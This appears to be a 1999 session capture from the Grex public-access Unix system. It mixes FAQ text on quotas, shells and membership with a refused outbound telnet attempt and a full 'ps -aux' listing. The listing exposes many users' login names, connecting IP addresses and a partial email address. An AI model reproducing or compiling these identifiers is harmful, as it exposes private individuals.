      We ask folks to keep their disk usage under a megabyte. You can find out how
      much disk space you are using (in kilobytes) by
      running the following command in your home directory:
       
          du -sk
       
      The number that comes back is the number of kilobytes of disk you are using.
      If you are using more than 1024, please remove files.
       
      If you are thinking of putting something big in your account, please talk to
      the Grex staff (staff@cyberspace.org) first. There aren't
      many good reasons to put big things in your Grex account: Grex doesn't allow
      multimedia files on its web pages (not even gifs and
      jpegs), and most of the useful programs that will actually run on Grex are
      already installed on Grex. So please talk to the staff first.
       
      * Why doesn't my arrow key work, so I can edit previous commands in sh?
       
      This is because Grex is running a real sh, and that is a feature not supported
      by sh. What some Unix systems call sh is actually
      bash, an enhanced version of the sh shell which does this. If you would like
      to use bash instead, you should change your shell on
      Grex to bash. You can do that by running the change command.
       
      * Why can't I edit previous commands in tcsh? It is supposed to support it.
       
      Tcsh does support previous line editing. Emacs conventions for command-line
      editing are the default at most sites, though Grex uses
      vi as the default for command-line editing. So you have two options: If you
      are handy with vi, hit escape to jump into command
      mode, then start editing your line as you would with vi. The second option is
      to type
       
          set -o emacs
       
      at the prompt. After that, you should be able to edit your command line in a
      way that is familiar to you. If you prefer to always use
      emacs as your command-line editor, then you'll want to place the "set -o
      emacs" line in your .login file.
       
      * Why does the last line of each page of text disappear from the screen before
      I can read it?
       
      This happens when Grex doesn't know how many rows of text are on your screen.
      The easiest way to set this correctly is to run the
      "change" program on Grex. It will count rows for you and display the correct
      number at the top of your screen (sometimes it can take
      some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and
      make the necessary changes to your startup files so
      that your settings will be right in the future. To run the change program,
      type "change" at a shell prompt, or "!change" from a menu or
      PicoSpan. Then select "change terminal type" and follow the menus from there.
       
      * Why do the bottom lines stay on the screen in the editor while the rest
      scroll normally?
       
      Same problem. Wrong number of lines in the setting. See solution above.
       
      * Why doesn't "screen" work when I disconnect from Grex?
       
      Grex runs a special daemon that kills all user processes when a user logs out.
      This prevents users from running servers or robots of
      any kind. It also prevents them from using the reconnect feature of screen
      (although the other features work fine). The reason for this
      policy is to prevent users from consuming our limited resources while not
      logged in.
       
      * I found a huge core file in my account. What should I do?
       
      Nothing really. This is a file that gets created if a program fails (crashes).
      It is intended to help the programmer find whatever bug
      caused the failure. If not renamed, these files will be deleted automatically
      in a day or two. You can delete it if you wish. By the way,
      a core file usually doesn't take up as much space on the disk as it appears
      to, because it is "sparse" (full of empty space).
       
      * How does the system decide where to put my home directory?
       
      Grex uses a hierarchical arrangement of home directories to keep the directory
      sizes from growing too large and thus becoming
      inefficient. So, on Grex, home directories are always located by a path of
      this form:
       
          /x/y/z/username
       
      The x is the disk letter, the y is the first letter of the username, and the z
      is the second letter of the username. Currently we have two
      disks that user accounts occupy, /a and /c (/b was not available). When we add
      a third disk, some users will be assigned on /d. The
      choice of disk is determined when your account is created, and this choice is
      switched back and forth manually by the staff to keep
      the available disk space balanced.
       
      The environment variable $HOME should always be set to the full path of your
      home directory. The ~ symbol may also be used as a
      shorthand for your home directory, as long as your shell supports it. (The
      Bourne Shell does not.)
       
      * Where can I get a self-contained multi-user chat program for my linux box?
       
      You might want to try out Grex's party program. See the Party Question in this
      FAQ.
       
      * I know something about Unix. How can I help the Grex staff?
       
      We are always delighted to have new volunteers. One of the things that Grex
      needs most urgently is more people to answer "write
      help" requests. It is recommended that you check out the helpers conference.
      To turn on your helper flag, run the Unix command
      "mesg -h y".
       
      Also you should read the Grex Staff Note on the topic of volunteering to be on
      the Grex staff.
       
      ----------------------------------------------------------------------------
      Last updated January 17, 1999 (srw)
      > telnet 24.112.43.46
       
      Sorry!  You need to be a *validated member* of Grex to use outbound internet
      services, including ftp and telnet, to connect to anything other than Grex
      itself.  To find out how to become a *member*, type "support" (without the
      quotes) at almost any prompt, or !support at the telnet or ftp prompt.
      To become a *validated* member, either pay for your membership with a personal
      check, or include a photocopy of a driver's license or other official ID along
      with your membership payment, or send mail to aruba (Grex's treasurer) to work
      out some other way of identifying yourself.  Membership costs $6/month - cheap!
       
      Grex has lots of options that are available to non-members.  Try typing
      "bbs" to join the conferences, or "menu" or "lynx" for two different menu
      systems that help you to find many options that you *can* use.
       
      If you have questions about Grex, you can find answers by joining the Info
      conference.  (Type "bbs info" to get there).  Or send mail to "staff".
       
      Thanks for trying out Grex!
       
      Trying 24.112.43.46 ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> exit
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> ls
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 244^H^H
      2: unknown host
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 244.1^H^H^H^H
      2: unknown host
      /usr/local/grex-scripts/.inet_real/telnet> p
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 24.112.43.46
      Trying 24.112.43.46 ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> close
      ?Need to be connected first.
      /usr/local/grex-scripts/.inet_real/telnet> quit
      > exit
      logout
       
      Grex central timekeeping.  At the beep, the time is
       6:26PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
       
      Grex central timekeeping.  At the beep, the time is
       6:20PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
      (ttys3) grex login: ccc
      ccc's Password:
      Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.
       
            Happy Birthday to Jishnu Nair (atticus's baby)!
       
      Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.112.43.46
      No mail.
      Type 'bbs' to see what Grex is all about!
      Type 'change' to change your settings.
      Type 'faq' to see answers to frequently asked questions.
      > ls -laFF
      total 10
      drwxr-xr-x   2 ccc      populus       512 Oct 19 18:14 ./
      drwxr-xr-x  16 root     wheel         512 Oct 19 18:13 ../
      -rw-r--r--   1 ccc      populus      1159 Oct 19 18:15 .agora31.cf
      -rw-r--r--   1 ccc      populus       778 Oct 19 18:13 .cfonce
      -rw-r--r--   1 ccc      populus       664 Oct 19 18:13 .cshrc
      -rw-r--r--   1 ccc      populus       718 Oct 19 18:13 .login
      -rw-r--r--   1 ccc      populus      1245 Oct 19 18:13 .mailrc
      -rw-------   1 ccc      populus       360 Oct 19 18:13 .plan
      > ps -aux
      USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
      ccc      13349 76.8  0.2  296  528 s3 R    18:21   0:03 ps -aux
      mikeaa   13347 30.8  0.1   36  264 t1 S    18:21   0:00 /usr/local/lib/gcc-lib/s
      root     13353 24.3  0.2  288  460 ?  S    18:21   0:00 sendmail: SAA13353 major
      mikeaa   13341  8.7  0.1   44  252 t1 S    18:21   0:00 /usr/local/bin/gcc.real
      root       152  8.3  0.0   12    8 ?  S    Oct 10521:55 update
      root     13352  3.9  0.1  120  264 t7 S    18:21   0:00 login -h 208.135.167.19
      root      7712  0.6  0.0   56   60 ?  S    17:39   0:05 telnetd ttyq3 207.91.203
      ccc      13228  0.5  0.3  264  732 s3 S    18:20   0:02 -tcsh (tcsh)
      root     13148  0.4  0.2   56  440 ?  S    18:20   0:02 telnetd ttyt7 208.135.16
      root        91  0.0  0.1   60  168 ?  S    Oct 10174:57 syslogd
      root        98  0.0  0.0  240   88 ?  S    Oct 10 32:13 sendmail: accepting conn
      root       112  0.0  0.0  136    0 ?  IW<  Oct 10 46:40 /usr/local/sbin/robocop
      root       102  0.0  0.0   60    0 ?  IW   Oct 10  0:01 rpc.statd
      daemon      62  0.0  0.0   56  112 ?  S    Oct 10 17:50 /usr/local/libexec/portm
      root     11493  0.0  0.0   56    0 ?  IW   18:10   0:02 telnetd ttyua 139.92.170
      root     10374  0.0  0.0   56   60 ?  S    18:02   0:19 telnetd ttyu1 204.212.46
      root       111  0.0  0.0  100    0 ?  IW   Oct 10103:12 /usr/local/sbin/idled
      root       113  0.0  0.0   24    0 ?  IW   Oct 10  0:00 /bin/sh /usr/local/Hughe
      root       105  0.0  0.2  140  448 ?  S    Oct 10 13:12 /usr/local/libexec/httpd
      hrcfan   11774  0.0  0.0  264    0 t2 IW   12:03   0:02 -tcsh (tcsh)
      root     13257  0.0  0.2  316  560 ?  S    18:20   0:00 sendmail: SAA13245 tilma
      root      1439  0.0  0.0   40    0 co IW   Oct 14  0:00 - std.9600 console (gett
      root     12376  0.0  0.2   56  436 ?  S    18:16   0:08 telnetd ttyr0 204.212.46
      cfadm    11371  0.0  0.0   96    0 q8 IW   18:09   0:02 /usr/local/bin/bbs
      msql       127  0.0  0.0  140    0 ?  IW   Oct 10276:15 /usr/local/Hughes/bin/ms
      root      3932  0.0  0.0   56    0 ?  IW   17:12   0:07 telnetd ttyr9 148.233.86
      janko     6567  0.0  0.2  144  504 r1 S    17:31   0:03 -bash (bash)
      root     12330  0.0  0.0  252    0 ?  IW   18:16   0:00 sendmail: server webpers
      root        84  0.0  5.01223212424 ?  S    Oct 10251:18 /usr/local/libexec/named
      richard  10202  0.0  0.0   36   56 pe S    18:01   0:00 watch ...
      root        71  0.0  0.0   36   52 ?  S    Oct 10  4:22 in.routed
      msql       126  0.0  0.0   52    0 ?  IW   Oct 10  0:00 /bin/csh -c /usr/local/H
      cfadm     2686  0.0  0.0  128    0 pe IW   17:02   0:06 /usr/local/bin/bbs
      root     11820  0.0  0.0  240    0 ?  IW   18:12   0:05 /usr/local/libexec/sshd
      ryan     12429  0.0  0.0  160    0 q5 IW   18:16   0:00 tcsh -c /a/r/y/ryan/pfil
      thea     10449  0.0  0.1 1264  300 u1 S    18:02   0:18 pine
      root       164  0.0  0.1   52  168 ?  S    Oct 10  8:06 cron
      root       219  0.0  0.0   40    0 b  IW   Oct 10  0:00 - std.9600 ttyb (getty)
      suchit     360  0.0  0.0  152    0 pa IW   16:43   0:07 -bash (bash)
      fb2      13125  0.0  0.0   36    0 ua IW   18:20   0:00 /bin/sh /b
      root     29495  0.0  0.0   40    0 ?  IW   06:01   0:00 in.ntalkd
      nobody   10684  0.0  0.3  216  628 ?  S    18:04   0:09 /usr/local/libexec/httpd
      root         2  0.0  0.0    0    0 ?  D    Oct 10  1:06 pagedaemon
      root     12583  0.0  0.2  328  524 ?  S    18:17   0:02 sendmail: RAA04763 serve
      mystar   28951  0.0  0.0   68    0 tf IW   16:31   0:02 -csh (csh)
      joe      13260  0.0  0.1   48  128 t8 S    18:20   0:00 /bin/sh /usr/local/bin/m
      root         1  0.0  0.0   52   20 ?  S    Oct 10  5:23 /sbin/init -
      root     11752  0.0  0.0   56    0 ?  IW   12:03   0:17 telnetd ttyt2 130.126.16
      mbollman 11691  0.0  0.0   72    0 p7 IW   18:12   0:01 -ksh (ksh)
      skymoon  10789  0.0  0.0   68    0 s8 IW   18:04   0:02 -csh (csh)
      root      2089  0.0  0.0   56    0 ?  IW   16:59   0:34 telnetd ttyu9 164.76.51.
      metgod   11225  0.0  0.0   68    0 t9 IW   18:07   0:01 ksh
      mikeaa   13340  0.0  0.0   72  112 t1 S    18:21   0:00 /bin/sh ./configure
      ya       10199  0.0  0.0   68    0 tc IW   18:01   0:02 -csh (csh)
      hrcfan   11415  0.0  0.0  184    0 t2 IW   18:09   0:01 elm
      root     10939  0.0  0.0   56   56 ?  S    18:05   0:09 telnetd ttyqd 198.182.64
      party    11972  0.0  0.1   72  328 t3 S    18:14   0:02 /usr/local/bin/party_
      root     28089  0.0  0.0   56    0 ?  IW   16:25   0:03 telnetd ttyte gate1.lci.
      jiffer   26209  0.0  0.0  264    0 r3 IW   16:12   0:02 -tcsh (tcsh)
      jackal   10326  0.0  0.0   48    0 rc TW   18:01   0:00 /bin/sh /usr/local/bin/m
      root     13199  0.0  0.2   56  436 ?  S    18:20   0:01 telnetd ttyt8 152.207.13
      root     28934  0.0  0.0   56   60 ?  S    16:31   0:13 telnetd ttytf 207.220.20
      meme      9643  0.0  0.0   68    0 tb IW   17:56   0:01 -csh (csh)
      nats      7089  0.0  0.0  172    0 q7 IW   17:35   0:01 elm
      root     10914  0.0  0.0   56   60 ?  S    18:05   0:06 telnetd ttypc 207.91.203
      root     13344  0.0  0.1  252  280 ?  S    18:21   0:00 sendmail: server tfabbs.
      root     11314  0.0  0.0   56    0 ?  IW   18:08   0:02 telnetd ttys4 24.48.58.2
      jackal   12828  0.0  0.0   36    0 rc TW   18:18   0:00 more -d
      root     10542  0.0  0.0   56    0 ?  IW   18:03   0:03 telnetd ttyq2 204.212.46
      root      7495  0.0  0.0   24    0 ?  IW   Oct 11  1:14 ./mdaemon -d
      root     11216  0.0  0.0   56    0 ?  IW   18:07   0:01 telnetd ttyt9 216.101.22
      archer    4089  0.0  0.0   48    0 r9 IW   17:13   0:00 /bin/sh /usr/local/bin/m
      root     11466  0.0  0.0   96    0 ?  IW   Oct 16  0:01 egrep USER|STOR|RETR|LIS
      root     22696  0.0  0.0   56    0 ?  IW   Oct 14  1:35 telnetd ttyu5 141.211.16
      root     11113  0.0  0.0   56    0 ?  IW   18:06   0:02 telnetd ttys0 198.108.22
      root     12296  0.0  0.0   56   60 ?  S    18:16   0:02 telnetd ttyq5 4.17.192.3
      robnoiz  11194  0.0  0.0  316    0 s0 IW   18:07   0:01 pine
      sekharg  10067  0.0  0.0   68    0 qb IW   17:59   0:01 -csh (csh)
      pfv      10343  0.0  0.0   36   56 u2 S    18:01   0:00 watch ...
      prime    11619  0.0  0.0   56    0 pc IW   18:11   0:01 -csh (csh)
      jazz       131  0.0  0.0  232    0 r2 IW   16:40   0:01 -tcsh (tcsh)
      pizo56   13130  0.0  0.2  800  516 ?  S    18:20   0:02 ftpd: quincy-ip-15-99.dy
      root      9885  0.0  0.0   56   60 ?  S    17:58   0:06 telnetd ttysa 198.182.64
      root     13275  0.0  0.2  300  388 ?  I    18:20   0:00 sendmail: SAA13263 f298.
      bebbe346 10528  0.0  0.0   48    0 t4 TW   18:02   0:00 mail pine
      nobody   11637  0.0  0.3  216  644 ?  S    18:11   0:04 /usr/local/libexec/httpd
      party     8477  0.0  0.1   72  328 t5 S    17:45   0:04 /usr/local/bin/party_
      root     11465  0.0  0.1   36  140 ?  S    Oct 16 14:41 tail -f /var/log/ftp.log
      wild     10942  0.0  0.0   40    0 qd IW   18:05   0:00 /bin/sh /b
      coop     16853  0.0  0.0  156    0 p4 IW   Oct 17  0:01 -bash (bash)
      saloon   10241  0.0  0.0  148    0 u0 IW   18:01   0:06 -bash (bash)
      root      2308  0.0  0.0   56    0 ?  IW   Oct 18  0:03 telnetd ttyp6 206.189.24
      root     14496  0.0  0.1   28  180 ?  S    12:25   0:12 in.comsat
      root     11920  0.0  0.0   56   60 ?  S    18:13   0:05 telnetd ttyt3 204.212.46
      root      9629  0.0  0.0   56   60 ?  S    17:55   0:16 telnetd ttytb 171.64.15.
      senna    29517  0.0  0.0   36    0 ue IW   16:36   0:02 watch ...
      root      6538  0.0  0.0   56   60 ?  S    17:31   0:07 telnetd ttyr1 158.193.82
      cfadm    11132  0.0  0.0   96    0 s0 IW   18:07   0:01 /usr/local/bin/bbs
      cfadm    11978  0.0  0.0  128    0 u5 IW   Oct 17  0:51 bbs staff
      wild     10963  0.0  0.0   48    0 qd IW   18:06   0:00 /bin/sh /usr/local/bin/m
      jackal   13021  0.0  0.0   40    0 rc IW   18:19   0:00 /bin/sh /usr/local/lib/m
      wasf     12094  0.0  0.0   68    0 q6 IW   18:15   0:01 -csh (csh)
      archer    3951  0.0  0.0   68    0 r9 IW   17:12   0:01 -csh (csh)
      root     12506  0.0  0.0   56    0 ?  IW   18:17   0:02 telnetd ttyu8 198.133.22
      jackal   13077  0.0  0.1   36  200 rc S    18:19   0:01 more -d
      root     10170  0.0  0.0   56    0 ?  IW   18:00   0:04 telnetd ttytc 163.121.88
      meme      9670  0.0  0.2  680  388 tb S    17:56   0:13 pine
      senna    29426  0.0  0.0   68    0 ue IW   16:35   0:01 -csh (csh)
      pfv      10305  0.0  0.0  260    0 u2 IW   18:01   0:02 -tcsh (tcsh)
      somesh   11383  0.0  0.0  380    0 s4 IW   18:09   0:01 lynx -cookies quote.yaho
      root     11906  0.0  0.0   56    0 ?  IW   18:13   0:05 telnetd ttysb 63.23.174.
      somesh   11322  0.0  0.0  264    0 s4 IW   18:08   0:01 -tcsh (tcsh)
      nobody   11899  0.0  0.3  216  664 ?  S    18:13   0:01 /usr/local/libexec/httpd
      root     29405  0.0  0.0   56   60 ?  S    16:35   0:06 telnetd ttyue 3com1a94.r
      krj      25504  0.0  0.0   56    0 q1 IW   16:09   0:01 -csh (csh)
      jackal   12792  0.0  0.0   40    0 rc TW   18:18   0:00 /bin/sh /usr/local/lib/m
      roelof   11869  0.0  0.0  264    0 p5 IW   18:13   0:03 -tcsh (tcsh)
      jackal   12830  0.0  0.0 1104    0 rc TW   18:18   0:00 sort
      root      8362  0.0  0.0   56   56 ?  S    17:44   0:04 telnetd ttyt5 202.56.224
      root     10766  0.0  0.0   56    0 ?  IW   18:04   0:04 telnetd ttys8 196.3.65.9
      nes16    10550  0.0  0.0   68    0 q2 IW   18:03   0:00 -csh (csh)
      root      7216  0.0  0.0   36  100 ?  S    20:57   3:02 tail -f /var/log/ftp.log
      root     12079  0.0  0.0   56   60 ?  S    18:14   0:03 telnetd ttyq6 front0.cpl
      tlaff    11081  0.0  0.0   40    0 td IW   18:06   0:00 /bin/sh /usr/local/lib/m
      nobody   10600  0.0  0.3  216  696 ?  S    18:03   0:05 /usr/local/libexec/httpd
      tlaff    11061  0.0  0.0   48    0 td IW   18:06   0:00 /bin/sh /usr/local/bin/m
      nobody    8285  0.0  0.0   32    0 ?  IW   Oct 11  0:01 fingerd
      root     25480  0.0  0.0   56   56 ?  S    16:08   0:46 telnetd ttyq1 35.8.1.4
      root     11004  0.0  0.0   56    0 ?  IW   18:06   0:03 telnetd ttys9 200.16.7.1
      nobody   11876  0.0  0.3  216  724 ?  S    18:13   0:05 /usr/local/libexec/httpd
      nes16    10580  0.0  0.0   48    0 q2 IW   18:03   0:00 /bin/sh /usr/local/bin/m
      abbagirl  2229  0.0  0.0   36    0 u9 IW   17:00   0:01 watch ...
      cfadm     3791  0.0  0.0  128    0 q1 IW   17:11   0:09 bbs
      jackal   13078  0.0  0.1   40  212 rc S    18:19   0:01 last
      archer    4105  0.0  0.0 1180    0 r9 IW   17:13   0:14 pine
      mauricio 11043  0.0  0.0   68    0 s9 IW   18:06   0:02 -csh (csh)
      root     10237  0.0  0.0   56   60 ?  S    18:01   0:11 telnetd ttyu0 137.224.19
      ryan     12439  0.0  0.1   44  268 q5 S    18:16   0:02 /a/r/y/ryan/pfilt/filter
      thea     10395  0.0  0.0   68    0 u1 IW   18:02   0:01 -csh (csh)
      mbollman 12350  0.0  0.0   28    0 p7 IW   18:16   0:00 /bin/sh /usr/local/bin/h
      mbollman 12551  0.0  0.0   40    0 p7 IW   18:17   0:00 more -d /usr/local/grexd
      root     26165  0.0  0.0   56   60 ?  S    16:12   0:18 telnetd ttyr3 165.215.30
      jackal   10254  0.0  0.0   68    0 rc IW   18:01   0:01 -csh (csh)
      joe      13308  0.0  0.5  252 1188 t8 S    18:20   0:00 pine
      jiffer   26334  0.0  0.0   36    0 r3 IW   16:13   0:02 watch ...
      root     10244  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyrc 206.10.105
      shrike   28123  0.0  0.0  272    0 te IW   16:25   0:02 -tcsh (tcsh)
      jopap     9888  0.0  0.0   68    0 sa IW   17:58   0:02 -csh (csh)
      menuadm  11948  0.0  0.0   60   88 u0 S    18:13   0:03 talk prime
      keesan   12650  0.0  0.0   68    0 qe IW   18:17   0:02 -csh (csh)
      krj      25547  0.0  0.0   36    0 q1 IW   16:09   0:02 watch ...
      root      3679  0.0  0.0  144    0 ?  IW   Oct 14 37:59 /usr/local/libexec/sshd
      greg99   12558  0.0  0.0  156    0 u8 IW   18:17   0:02 -bash (bash)
      jackal   12829  0.0  0.0  328    0 rc TW   18:18   0:30 ps -aux
      party    29735  0.0  0.0   80  104 ue S    16:38   0:07 /usr/local/bin/party_
      tadeu    16231  0.0  0.0  796    0 ?  IW   12:39   0:01 ftpd: 200.249.132.149: t
      root     13305  0.0  0.1  252  208 ?  S    18:20   0:00 sendmail: startup with l
      root      8487  0.0  0.0   56    0 ?  IW   17:45   0:04 telnetd ttyt4 202.60.130
      jackal   12987  0.0  0.0   48    0 rc IW   18:19   0:00 /bin/sh /usr/local/bin/m
      cfadm    12155  0.0  0.0   96    0 qd IW   18:15   0:01 bbs
      party    11136  0.0  0.1   72  140 td S    18:07   0:02 /usr/local/bin/party_
      rjh123   11441  0.0  0.0  428  124 q8 IW   18:09   0:07 pine
      root     10897  0.0  0.0   56   56 ?  S    18:05   0:08 telnetd ttyt1 209.138.42
      root      2642  0.0  0.0   56   56 ?  S    17:02   0:17 telnetd ttype 161.233.38
      vetri     7729  0.0  0.1   80  160 q3 S    17:39   0:03 -csh (csh)
      party    10050  0.0  0.0   60  104 pe S    17:59   0:04 /usr/local/bin/party_
      mikeaa   12286  0.0  0.1   72  156 t1 S    18:16   0:07 /bin/sh ./configure
      shooter   4464  0.0  0.0  800    0 ?  IW   14:53   0:03 ftpd: 212.49.231.161: sh
      mooncat  11921  0.0  0.0   68    0 t3 IW   18:13   0:01 -csh (csh)
      cfadm    11016  0.0  0.0   96    0 td IW   18:06   0:01 /usr/local/bin/bbs
      pfv      10369  0.0  0.1   52  200 u2 S    18:02   0:07 /a/p/f/pfv/bin/pfilt
      root     16844  0.0  0.0  496    0 ?  IW   Oct 17  1:23 /usr/local/libexec/sshd
      mdw      22714  0.0  0.0   76    0 u5 IW   Oct 14  0:06 -csh (csh)
      bebbe346  8506  0.0  0.0   68    0 t4 IW   17:45   0:01 -csh (csh)
      pinhead  12766  0.0  0.0  796    0 ?  IW   18:18   0:02 ftpd: a03169.sp.mandic.c
      root     29798  0.0  0.0   40    0 ?  IW   06:03   0:00 in.ntalkd
      shrike    2942  0.0  0.0  224    0 te IW   17:05   0:03 elm
      somesh   11379  0.0  0.0   28    0 s4 IW   18:09   0:00 /bin/sh ./q
      party     7116  0.0  0.1   60  320 q1 S    17:35   0:07 /usr/local/bin/party_
      root     12718  0.0  0.0   56    0 ?  IW   12:08   0:35 telnetd ttyq7 edsel.smud
      root     15158  0.0  0.0   56    0 ?  IW   12:30   0:43 telnetd ttyq0 inet.bdsi.
      root     11000  0.0  0.2   56  436 ?  S    18:06   0:05 telnetd ttytd 128.196.22
      thea     10435  0.0  0.0   48    0 u1 IW   18:02   0:00 /bin/sh /usr/local/bin/m
      root       134  0.0  0.0   56    0 ?  IW   16:40   0:49 telnetd ttypa 129.115.11
      sys      10314  0.0  0.0   36   44 ?  I    11:54   0:09 in.identd -w -t300 -l
      ryan     12424  0.0  0.1   36  152 q5 S    18:16   0:00 /a/r/y/ryan/watch ...
      root      2470  0.0  0.0   68    0 u5 TW   Oct 17  0:02 -sh (csh)
      sys      26321  0.0  0.0   48    0 ?  IW   Oct 11  0:00 in.identd -w -t300 -l
      mikeaa   10916  0.0  0.0  156    0 t1 IW   18:05   0:03 -bash (bash)
      root     26487  0.0  0.0   56   60 ?  S    19:26   1:47 inetd
      neya     15160  0.0  0.0   72    0 q0 IW   12:30   0:06 -csh (csh)
      root       120  0.0  0.0   56   56 ?  R    16:40  40:18 telnetd ttyr2 147.225.19
      krj      25545  0.0  0.0   36    0 q1 IW   16:09   0:03 watch ...
      root     13219  0.0  0.2   56  432 ?  S    18:20   0:01 telnetd ttys3 24.112.155
      sj2       8398  0.0  0.0  144    0 t5 IW   17:45   0:01 -bash (bash)
      keesan   12720  0.0  0.0   48   60 qe S    18:18   0:00 mail wlevak
      nes16    10616  0.0  0.0  448    0 q2 IW   18:03   0:02 pine
      root     10058  0.0  0.0   56    0 ?  IW   17:59   0:02 telnetd ttyqb 24.30.48.8
      nats     12725  0.0  0.0   68    0 q7 IW   12:08   0:05 -csh (csh)
      abbagirl  2171  0.0  0.0   64    0 u9 IW   16:59   0:02 -csh (csh)
      party    26762  0.0  0.1   80  208 r3 S    16:16   0:11 /usr/local/bin/party_
      party    12225  0.0  0.1   72  180 qd S    18:15   0:01 /usr/local/bin/party_
      root     10287  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyu2 216.93.16.
      ryan     12318  0.0  0.0   68    0 q5 IW   18:16   0:01 -csh (csh)
      root     12644  0.0  0.0   56   60 ?  S    18:17   0:07 telnetd ttyqe 204.212.46
      jopap    13073  0.0  0.4  552  876 sa S    18:19   0:01 pico.real -z all
      root     13324  0.0  0.1  124  264 r0 S    18:21   0:00 login -h 204.212.46.132
      menuadm  11776  0.0  0.0   60   96 pc S    18:12   0:02 talk saloon
      wasf     12131  0.0  0.0   48    0 q6 IW   18:15   0:00 /bin/sh /usr/local/bin/m
      root      9139  0.0  0.3  480  668 ?  S    17:51   0:17 sendmail: HAA21168 hcldl
      wasf     12185  0.0  0.3  460  620 q6 S    18:15   0:03 pine
      pfv      10360  0.0  0.0  192    0 u2 IW   18:02   0:01 tcsh -c ~pfv/bin/pfilt
      party    12426  0.0  0.1   80  336 q5 S    18:16   0:01 eggdrop
      root     10736  0.0  0.0  396    0 ?  IW   18:04   0:10 sendmail: FAA18438 rings
      greg99   12719  0.0  0.0  348    0 u8 IW   18:18   0:01 lynx
      party    10347  0.0  0.0   80  112 u2 S    18:01   0:04 /usr/local/bin/party_ #p
      root     13154  0.0  0.0  120    0 sb IW   18:20   0:00 login -h 63.23.174.219 -
      root     11357  0.0  0.0   56   60 ?  IW   18:09   0:07 telnetd ttyq8 207.91.203
      root     13276  0.0  0.0   92  188 ?  IW   18:20   0:00 mail -r reenaf@hotmail.c
      root      7217  0.0  0.0   96  104 ?  IW   20:57   0:06 egrep USER|STOR|RETR|LIS
      nobody   11759  0.0  0.3  216  680 ?  S    18:12   0:01 /usr/local/libexec/httpd
      root     11668  0.0  0.0   56    0 ?  IW   18:11   0:01 telnetd ttyp7 152.171.23
      root         0  0.0  0.0    0    0 ?  D    Oct 10154:26 swapper
      mystar   12365  0.0  0.1  504  340 tf S    18:16   0:05 lynx sports.yahoo.com
      joe      13217  0.0  0.0   68    0 t8 IW   18:20   0:01 -csh (csh)
      nobody   11761  0.0  0.3  216  708 ?  S    18:12   0:03 /usr/local/libexec/httpd
      > faq
                     Frequently Asked Questions About Grex
       
      General
       
      * What is Grex?
       
      Grex is a public-access computer conferencing system in Ann Arbor, Michigan,
      USA. It is cooperatively owned and operated, and is
      supported entirely by donations from users. All staff members are volunteers.
       
      * What does the name "Grex" mean?
       
      Grex is not an acronym. It is a Latin word meaning "flock". It is the root of
      a number of familiar English words such as aggregate,
      congregate, and gregarious.
       
      * What can I do on this system?
       
      Grex provides all of the following services for free.
       
        o Electronic conferencing using "PicoSpan" or "Backtalk"
        o Internet e-mail using "mail", "elm", "pine" or "mh"
        o Browse the web in text mode using "lynx"
        o Access to usenet via "lynx" to the dejanews web site
        o Multichannel real-time chat using "party"
        o Free text-only web site hosting.
        o On-line games, including "Nethack"
        o Access to a Unix shell account, with all standard commands
        o Access to the C/C++ compiler, assembler, and other development tools
       
      However, Grex does not provide any of the following services at all:
       
        o Download areas
        o Mailing lists
        o Bots (for IRC or anything else)
        o Graphical web page hosting
        o A place to store files
       
      And there are a few things you can only do if you are a member (who has made a
      donation and sent ID). These are
       
        o Vote in Grex elections.
        o Serve on the board of Cyberspace Communications.
        o Access telnet, ftp, and irc sites from Grex.
        o Access web sites running on unusual ports, via lynx from Grex.
       
      * What operating system is Grex running?
       
      Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not
      Linux, but it is Unix, so in many ways it is similar to
      Linux. There are a lot of details about Grex's configuration available in the
      Grex staff notes on the web.
      http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and
      software.
       
      ----------------------------------------------------------------------------
       
      Conferencing
       
      * What is "computer conferencing?"
       
      A computer conference is an area set aside for discussion on some general
      topic, such as computers, politics, or gardening. In such
      an area, people can read what other people have posted, and can introduce new
      subtopics or add responses to existing ones. On
      many systems, conferences are called "forums". Grex has many conferences. For
      a complete list, see
      http://cyberspace.org/cgi-bin/bt/pistachio/conflist.
       
      * How can I participate in Grex's conferences?
       
      Grex's conferences are accessible by a text-based terminal interface or by the
      World Wide Web. To access the text-based interface,
      either dial direct or telnet to Grex and run the "bbs" command. (This command
      is run automatically every time you log in if you
      choose the "bbs shell" when you create your account.) World Wide Web access is
      provided by Grex's "Backtalk" conferencing
      software. Please see http://cyberspace.org/backtalk.html for details on using
      Backtalk.
       
      ----------------------------------------------------------------------------
       
      Governance
       
      * How is Grex governed?
       
      Cyberspace Communications functions as an online democracy, with policies set
      by its users. The Co-op Conference is open to all
      users and provides a forum for discussing policy issues. The Board of
      Directors, elected by the members, is the formal governing
      body and uses consensus in the Co-op Conference as its primary guide for
      making decisions. Any member of Grex who can attend
      the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the
      Board of Directors. In addition, any member can call a
      binding vote by the membership on any policy issue. The Articles of
      Incorporation and Bylaws can be viewed online.
       
      * How can I participate in Grex governance?
       
      Any user can have a voice in Grex governance by joining the Co-op conference
      and participating in the discussions there. If you
      wish to be eligible to vote in Grex elections and to run for the Board of
      Directors, you can become a Grex member. Membership
      dues are US$6/month or US$60/year. To find out how to make membership
      payments, please see
      http://cyberspace.org/member.html. Membership donations are Grex's primary
      source of financing.
       
      * Can I pay for membership by credit card?
       
      Unfortunately, no. Grex has investigated the possibility of accepting
      memberships by credit card, but the setup cost and monthly
      charges that we would have to pay to the bank are too high for us to pay. We
      do accept personal checks in US funds drawn on a US
      bank, US currency (not recommended to send by mail), and international money
      orders.
       
      ----------------------------------------------------------------------------
       
      How do I ... ?
       
      * How do I change my name, my shell, my mail forwarding, my password, or my
